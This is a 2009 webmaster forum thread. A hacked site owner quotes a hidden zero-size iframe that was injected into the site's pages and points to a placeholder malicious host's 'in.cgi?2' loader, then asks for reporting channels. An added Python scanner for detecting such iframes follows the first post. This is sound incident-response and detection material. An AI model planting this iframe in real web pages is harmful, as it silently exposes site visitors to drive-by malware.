iframe injection - what's this doing - "in.cgi?2" Who do I tell?

do you recognise the malware action?

knonymouse

10:22 pm on Jun 26, 2009 (gmt 0)

10+ Year Member
My site has been hacked - I wish I knew how - I'm locking down as much as I can find out to do, and talking with my shared host ISP. That's not my question, for now. There are ftp logs of the intrusion.

On various web page files on the server, the injected iframe looks like this:
<iframe src="http://DUMMYMALICIOUSDOMAIN/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

I would gladly "name and shame" by supplying the actual values of DUMMYMALICIOUSDOMAIN I have seen - if permitted in the forum. I have seen several. For now, assume they are typos of the legitimate domain "global-analytics" and so on. BTW, all those malicious domain names I've seen were registered by the same domain name registrar.

The last part of the URL "in.cgi?2" is always the same. If you are familiar with this exploit, is it known exactly what this is really doing... has its action been specifically identified?

Meanwhile.... who do I tell?

If I put DUMMYMALICIOUSDOMAIN into Domain Tools, I find the domain name registrar is the same. I notify them my site has been hacked and give the domain name in the URL in the iframe injection. They don't seem to want to take any action. "Notify privacyprotect.org," they say.

As to notifying the host server....
no valid abuse address ... just contact@privacyprotect.org
no valid postal address ... All Postal Mails Rejected, visit Privacyprotect.org

I don't want to notify the malicious people about abuse they already know good and well they are up to. Are they running their own servers? How can I go upstream to a legitimate authority I can trust and that can AND WILL take action ?

On the other hand, does "Domain Status: Registered And No Website" mean someone has already taken action? But if that is not the case yet, what can I do to curtail the #*$!s' global activity?
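A small scanner for finding the injected tag across a site's page files, added here as an example and not code from the original post. It assumes the pattern quoted above (zero width/height iframe whose src points off-site or at an in.cgi? path); the host names in it are placeholders.

```python
# Added example, not from the original post: flag hidden iframes that point
# off-site (or at an in.cgi? loader) in saved page files. Host names are placeholders.
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def is_hidden(attrs):
    """Zero-size or display:none iframes are invisible to the visitor."""
    w = attrs.get("width", "").strip().lower().rstrip("px")
    h = attrs.get("height", "").strip().lower().rstrip("px")
    style = attrs.get("style", "").replace(" ", "").lower()
    return w == "0" or h == "0" or "display:none" in style

def find_suspicious_iframes(html, site_host):
    """Return hidden iframes whose src is off-site or uses the in.cgi? path."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or site_host).lower()  # relative = same host
        off_site = host != site_host.lower()
        if is_hidden(attrs) and (off_site or "in.cgi" in src.lower()):
            hits.append({"src": src, "host": host, "off_site": off_site})
    return hits

def scan_tree(root, site_host, suffixes=(".html", ".htm", ".php")):
    """Walk a site directory; map each infected file to its suspicious srcs."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in suffixes:
            hits = find_suspicious_iframes(path.read_text(errors="replace"), site_host)
            if hits:
                report[str(path)] = [h["src"] for h in hits]
    return report

# Constructed sample: the injected tag from the thread beside a legitimate one.
SAMPLE = ('<p>hi</p><iframe src="http://DUMMYMALICIOUSDOMAIN/in.cgi?2" width="0" '
          'height="0" frameborder="0"></iframe>'
          '<iframe src="/video.html" width="300" height="200"></iframe>')
```

Run it against a local copy of the site with scan_tree("/path/to/site", "yourdomain.example"); the report lists each file with the iframe src values it should not contain, which is also the list to hand over with the FTP logs.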

tedster

11:26 pm on Jun 26, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member
No, we don't name names - and there would be too many if we tried. Here are some resources that should help:

[stopbadware.org...]

[webmasterworld.com...]

tedster

2:38 am on Jun 27, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member
Some added help - of a very tangible variety. Contact the Internet Storm Center at [isc.sans.org...] with your explanations, logs, samples, anything relevant all zipped up with password "infected".

The Internet Storm Center has a history of checking these things, writing up diaries about it if relevant and notifying the right people to take action.

tedster

2:45 am on Jun 28, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member
I'm glad to see from your post in our Bing Forum [webmasterworld.com] that you got this well resolved. Thanks for keeping us in the loop.